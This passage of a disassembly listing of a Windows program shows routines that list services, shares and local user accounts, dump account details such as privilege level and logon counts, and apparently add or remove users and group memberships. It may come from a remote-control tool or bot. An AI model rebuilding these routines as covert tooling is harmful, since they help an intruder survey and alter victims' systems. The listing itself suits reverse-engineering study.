var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_43CA18 ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_412F4B: ; CODE XREF: sub_412F13+123�j
lea eax, [ebp+var_8]
loc_412F4E: ; DATA XREF: .text:off_42B8CC�o
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_43C9E4 ; EnumServicesStatusA
test eax, eax
jnz short loc_412F85
call dword_421088 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_41303C
loc_412F85: ; CODE XREF: sub_412F13+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_413033
lea esi, [ebp+var_188]
loc_412F96: ; CODE XREF: sub_412F13+11A�j
mov eax, [esi+8]
dec eax
jz short loc_412FE2
dec eax
jz short loc_412FDB
dec eax
jz short loc_412FD4
dec eax
jz short loc_412FCD
dec eax
jz short loc_412FC6
dec eax
jz short loc_412FBF
dec eax
lea eax, [ebp+var_20]
jz short loc_412FB8
push offset aUnknown_0 ; " Unknown"
jmp short loc_412FEA
; ---------------------------------------------------------------------------
loc_412FB8: ; CODE XREF: sub_412F13+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_412FEA
; ---------------------------------------------------------------------------
loc_412FBF: ; CODE XREF: sub_412F13+96�j
push offset aPausing ; " Pausing"
jmp short loc_412FE7
; ---------------------------------------------------------------------------
loc_412FC6: ; CODE XREF: sub_412F13+93�j
push offset aContinuing ; " Continuing"
jmp short loc_412FE7
; ---------------------------------------------------------------------------
loc_412FCD: ; CODE XREF: sub_412F13+90�j
push offset aRunning_0 ; " Running"
jmp short loc_412FE7
; ---------------------------------------------------------------------------
loc_412FD4: ; CODE XREF: sub_412F13+8D�j
push offset aStoping ; " Stoping"
jmp short loc_412FE7
; ---------------------------------------------------------------------------
loc_412FDB: ; CODE XREF: sub_412F13+8A�j
push offset aStarting ; " Starting"
jmp short loc_412FE7
; ---------------------------------------------------------------------------
loc_412FE2: ; CODE XREF: sub_412F13+87�j
push offset aStopped ; " Stopped"
loc_412FE7: ; CODE XREF: sub_412F13+B1�j
; sub_412F13+B8�j ...
lea eax, [ebp+var_20]
loc_412FEA: ; CODE XREF: sub_412F13+A3�j
; sub_412F13+AA�j
push eax
call sub_415316
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS ; "%s: %s (%s)"
push eax
call sub_415316
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_412F96
loc_413033: ; CODE XREF: sub_412F13+77�j
cmp [ebp+var_8], ebx
jnz loc_412F4B
loc_41303C: ; CODE XREF: sub_412F13+6C�j
push [ebp+var_C]
call dword_43C928 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_412F13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413053 proc near ; CODE XREF: sub_40CD3A:loc_40EC86�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4130EC
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41307C
dec eax
jnz short loc_4130CC
push edi
push 0
call sub_413225
pop ecx
pop ecx
jmp short loc_4130C8
; ---------------------------------------------------------------------------
loc_41307C: ; CODE XREF: sub_413053+18�j
cmp [ebp+arg_8], 0
jnz short loc_4130BA
push 24h
push edi
call sub_416F20
pop ecx
test eax, eax
pop ecx
jnz short loc_4130BA
push 57h
pop eax
loc_413093: ; CODE XREF: sub_413053+77�j
push eax
call sub_4139F3
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_46B2D0
push off_436C98[eax*4]
push offset dword_4373B4
push esi
call sub_415316
add esp, 18h
jmp short loc_41310C
; ---------------------------------------------------------------------------
loc_4130BA: ; CODE XREF: sub_413053+2D�j
; sub_413053+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_413179
add esp, 0Ch
loc_4130C8: ; CODE XREF: sub_413053+27�j
test eax, eax
jnz short loc_413093
loc_4130CC: ; CODE XREF: sub_413053+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_46B2D0
push off_436C9C[eax*4]
push offset dword_437384
push esi
call sub_415316
add esp, 10h
jmp short loc_41310C
; ---------------------------------------------------------------------------
loc_4130EC: ; CODE XREF: sub_413053+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_46B2D0
lea eax, [eax+eax*2]
push off_436C98[eax*4]
push offset dword_43734C
push esi
call sub_415316
add esp, 0Ch
loc_41310C: ; CODE XREF: sub_413053+65�j
; sub_413053+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_413053 endp
; =============== S U B R O U T I N E =======================================
sub_413112 proc near ; CODE XREF: sub_414500+247�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_41311F
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41311F: ; CODE XREF: sub_413112+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, dword_421138
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_46B4D0, 1
mov ebp, eax
jnz short loc_41315C
or byte_46B4D0, 1
lea eax, [ebp+1]
push eax
call sub_416655
pop ecx
mov dword_46B268, eax
loc_41315C: ; CODE XREF: sub_413112+32�j
push esi
push esi
push ebp
push dword_46B268
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_46B268
pop edi
pop ebp
pop ebx
pop esi
retn
sub_413112 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413179 proc near ; CODE XREF: sub_413053+6D�p
; sub_414826+18E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_4131E4
push [ebp+arg_4]
mov edi, eax
call sub_4131E4
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_416F20
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_4131E4
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_43C924
pop edi
leave
retn
sub_413179 endp
; =============== S U B R O U T I N E =======================================
sub_4131E4 proc near ; CODE XREF: sub_413179+A�p
; sub_413179+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_4131F1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4131F1: ; CODE XREF: sub_4131E4+9�j
push ebx
push esi
mov esi, dword_421064
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_416655
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_4131E4 endp
; =============== S U B R O U T I N E =======================================
sub_413225 proc near ; CODE XREF: sub_413053+20�p
; sub_414500+1BC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4131E4
push [esp+8+arg_4]
mov esi, eax
call sub_4131E4
pop ecx
pop ecx
push 0
push eax
push esi
call dword_43C8FC
pop esi
retn
sub_413225 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413248 proc near ; CODE XREF: sub_40CD3A+1F78�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_4131E4
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 18h
loc_413281: ; CODE XREF: sub_413248+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_43C970
mov ebx, eax
cmp ebx, esi
jz short loc_4132E4
cmp ebx, 0EAh
jz short loc_4132E4
push ebx
push ebx
call sub_4139F3
pop ecx
push eax
lea eax, [ebp+var_210]
push offset dword_437414
push eax
call sub_415316
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 24h
jmp short loc_413351
; ---------------------------------------------------------------------------
loc_4132E4: ; CODE XREF: sub_413248+5D�j
; sub_413248+65�j
xor edi, edi
inc edi
cmp [ebp+arg_C], edi
jb short loc_413348
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_4132F2: ; CODE XREF: sub_413248+FC�j
push dword ptr [esi+10h]
call dword_43C918 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_413309
mov eax, offset aNo ; "No"
loc_413309: ; CODE XREF: sub_413248+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_415316
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_4132F2
xor esi, esi
loc_413348: ; CODE XREF: sub_413248+A2�j
push [ebp+var_4]
call dword_43CAB4
loc_413351: ; CODE XREF: sub_413248+9A�j
cmp ebx, 0EAh
jz loc_413281
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_413248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413369 proc near ; CODE XREF: sub_40CD3A:loc_40ED22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_41340D
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_4133AB
dec eax
jz short loc_4133A0
dec eax
jnz short loc_4133C6
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_4134AF
add esp, 14h
jmp short loc_4133C2
; ---------------------------------------------------------------------------
loc_4133A0: ; CODE XREF: sub_413369+1D�j
push ebx
push edi
call sub_41348E
pop ecx
pop ecx
jmp short loc_4133C2
; ---------------------------------------------------------------------------
loc_4133AB: ; CODE XREF: sub_413369+1A�j
cmp [ebp+arg_8], edi
jz short loc_4133BF
push [ebp+arg_8]
push ebx
push edi
call sub_413434
add esp, 0Ch
jmp short loc_4133C2
; ---------------------------------------------------------------------------
loc_4133BF: ; CODE XREF: sub_413369+45�j
push 57h
pop eax
loc_4133C2: ; CODE XREF: sub_413369+35�j
; sub_413369+40�j ...
cmp eax, edi
jnz short loc_4133E6
loc_4133C6: ; CODE XREF: sub_413369+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_46B4D8
push off_436C9C[eax*4]
push offset dword_437508
push esi
call sub_415316
add esp, 10h
jmp short loc_41342D
; ---------------------------------------------------------------------------
loc_4133E6: ; CODE XREF: sub_413369+5B�j
push eax
call sub_4139F3
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_46B4D8
push off_436C98[eax*4]
push offset dword_4374C8
push esi
call sub_415316
add esp, 18h
jmp short loc_41342D
; ---------------------------------------------------------------------------
loc_41340D: ; CODE XREF: sub_413369+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_46B4D8
lea eax, [eax+eax*2]
push off_436C98[eax*4]
push offset dword_437488
push esi
call sub_415316
add esp, 0Ch
loc_41342D: ; CODE XREF: sub_413369+7B�j
; sub_413369+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_413369 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413434 proc near ; CODE XREF: sub_413369+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_4131E4
push [ebp+arg_4]
mov edi, eax
call sub_4131E4
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_4131E4
add esp, 0Ch
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
lea ecx, [ebp+var_4]
mov [ebp+var_20], eax
xor eax, eax
push ecx
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_43C908
pop edi
leave
retn
sub_413434 endp
; =============== S U B R O U T I N E =======================================
sub_41348E proc near ; CODE XREF: sub_413369+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4131E4
push [esp+8+arg_4]
mov esi, eax
call sub_4131E4
pop ecx
pop ecx
push eax
push esi
call dword_43C8F8
pop esi
retn
sub_41348E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4134AF proc near ; CODE XREF: sub_413369+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_4131E4
push [ebp+arg_4]
mov esi, eax
call sub_4131E4
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_43CA7C
test eax, eax
mov [ebp+arg_0], eax
jnz loc_41383C
mov eax, [ebp+var_4]
test eax, eax
jz loc_413877
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_415316
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_4135C8
dec eax
jz short loc_4135C1
dec eax
jz short loc_4135BA
mov eax, offset aUnknown ; "Unknown"
jmp short loc_4135CD
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_4134AF+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_4135CD
; ---------------------------------------------------------------------------
loc_4135C1: ; CODE XREF: sub_4134AF+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_4135CD
; ---------------------------------------------------------------------------
loc_4135C8: ; CODE XREF: sub_4134AF+FC�j
mov eax, offset aGuest ; "Guest"
loc_4135CD: ; CODE XREF: sub_4134AF+109�j
; sub_4134AF+110�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_415316
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_412BD1
add esp, 20h
pop edi
pop ebx
jmp short loc_413868
; ---------------------------------------------------------------------------
loc_41383C: ; CODE XREF: sub_4134AF+35�j
push eax
lea eax, [ebp+var_204]
push offset dword_43753C
push eax
call sub_415316
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_412BD1
add esp, 20h
loc_413868: ; CODE XREF: sub_4134AF+38B�j
cmp [ebp+var_4], 0
jz short loc_413877
push [ebp+var_4]
call dword_43CAB4
loc_413877: ; CODE XREF: sub_4134AF+40�j
; sub_4134AF+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_4134AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41387D proc near ; CODE XREF: sub_40CD3A+2014�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_4131E4
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 18h
loc_4138BC: ; CODE XREF: sub_41387D+12B�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_43C98C
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_41391D
cmp eax, 0EAh
jz short loc_41391D
push eax
push eax
call sub_4139F3
pop ecx
push eax
lea eax, [ebp+var_218]
push offset dword_437734
push eax
call sub_415316
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 24h
jmp short loc_41398E
; ---------------------------------------------------------------------------
loc_41391D: ; CODE XREF: sub_41387D+62�j
; sub_41387D+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_4139A1
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_41398E
loc_41392B: ; CODE XREF: sub_41387D+E9�j
cmp edi, esi
lea eax, [ebp+var_218]
jz short loc_41396A
push dword ptr [edi]
push offset aS_5 ; " %S"
push eax
call sub_415316
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_41392B
jmp short loc_41398E
; ---------------------------------------------------------------------------
loc_41396A: ; CODE XREF: sub_41387D+B6�j
push offset dword_4376EC
push eax
call sub_415316
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 1Ch
loc_41398E: ; CODE XREF: sub_41387D+9E�j
; sub_41387D+AC�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_4139A1
push edi
call dword_43CAB4
xor edi, edi
mov [ebp+var_4], edi
loc_4139A1: ; CODE XREF: sub_41387D+A5�j
; sub_41387D+116�j
cmp [ebp+var_C], 0EAh
jz loc_4138BC
cmp edi, esi
jz short loc_4139B9
push edi
call dword_43CAB4
loc_4139B9: ; CODE XREF: sub_41387D+133�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_415316
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41387D endp
; =============== S U B R O U T I N E =======================================
sub_4139F3 proc near ; CODE XREF: sub_413053+41�p
; sub_413248+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_413AA5
jz loc_413A9E
cmp eax, 7Bh
ja short loc_413A6A
jz short loc_413A60
cmp eax, 5
jz short loc_413A56
cmp eax, 8
jz short loc_413A4C
cmp eax, 32h
jz short loc_413A42
cmp eax, 35h
jz short loc_413A38
cmp eax, 57h
jnz loc_413AF4
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A38: ; CODE XREF: sub_4139F3+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A42: ; CODE XREF: sub_4139F3+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A4C: ; CODE XREF: sub_4139F3+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A56: ; CODE XREF: sub_4139F3+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A60: ; CODE XREF: sub_4139F3+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A6A: ; CODE XREF: sub_4139F3+1A�j
sub eax, 7Ch
jz short loc_413A97
sub eax, 7C8h
jz short loc_413A90
dec eax
jz short loc_413A86
dec eax
jnz short loc_413AF4
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A86: ; CODE XREF: sub_4139F3+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_413B15
; ---------------------------------------------------------------------------
loc_413A90: ; CODE XREF: sub_4139F3+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413A97: ; CODE XREF: sub_4139F3+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413A9E: ; CODE XREF: sub_4139F3+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413AA5: ; CODE XREF: sub_4139F3+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_413ADE
jz short loc_413AD7
sub eax, 8ADh
jz short loc_413B09
dec eax
dec eax
jz short loc_413AD0
dec eax
jz short loc_413AC9
dec eax
dec eax
jnz short loc_413AF4
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413AC9: ; CODE XREF: sub_4139F3+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413AD0: ; CODE XREF: sub_4139F3+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413AD7: ; CODE XREF: sub_4139F3+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413ADE: ; CODE XREF: sub_4139F3+B9�j
sub eax, 8CAh
jz short loc_413B10
sub eax, 17h
jz short loc_413B09
sub eax, 25h
jz short loc_413B02
sub eax, 29h
jz short loc_413AFB
loc_413AF4: ; CODE XREF: sub_4139F3+35�j
; sub_4139F3+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413AFB: ; CODE XREF: sub_4139F3+FF�j
